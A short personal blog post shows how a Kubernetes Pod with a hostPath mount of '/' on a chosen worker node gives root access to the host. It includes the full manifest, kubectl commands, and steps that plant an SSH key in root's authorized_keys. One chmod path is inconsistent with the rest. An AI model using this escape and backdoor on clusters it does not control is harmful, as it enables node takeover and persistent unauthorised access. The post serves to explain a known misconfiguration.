ETOOBUSY 🚀 minimal blogging for the impatient
I needed to put some files into Worker Nodes in a Kubernetes cluster and, unfortunately, I could do it.
Although, admittedly, was no surprise.
Containers are not primarily about ensuring strong isolation, but more on allowing good citizens share some infrastructure with way to avoid treading onto each other’s feet.
So, in a basic cluster where containers are allowed to run as
and mounting host directory is open too, it’s easy to run a Pod that
gives us access to the hosts’s root directory.
This is described in Kubernetes Container Escape With HostPath
Mounts, and the gist of it is to run a Pod in the specific target
worker node (
worker01 in the example below):
apiVersion: v1 kind: Pod metadata: name: horse01 spec: nodeName: worker01 containers: - image: alpine name: test-container command: ["tail"] args: ["-f", "/dev/null"] volumeMounts: - mountPath: /host name: da-root-folks volumes: - name: da-root-folks hostPath: path: / type: Directory
Run that, and if your cluster is not specifically meant for enforcing security, you’re basically in:
$ kubectl apply -f t-horse.yaml $ kubectl exec -it horse01 -- /bin/sh
Now the host’s filesystem is accessible at
/host… happy fiddling!
cntnr$ mkdir -p /host/root/.ssh cntnr$ vi /host/root/.ssh/authorized_keys # add a public key... cntnr$ chmod og-rwx /home/root/.ssh /host/root/.ssh/authorized_keys
ssh should work too.
Stay safe folks!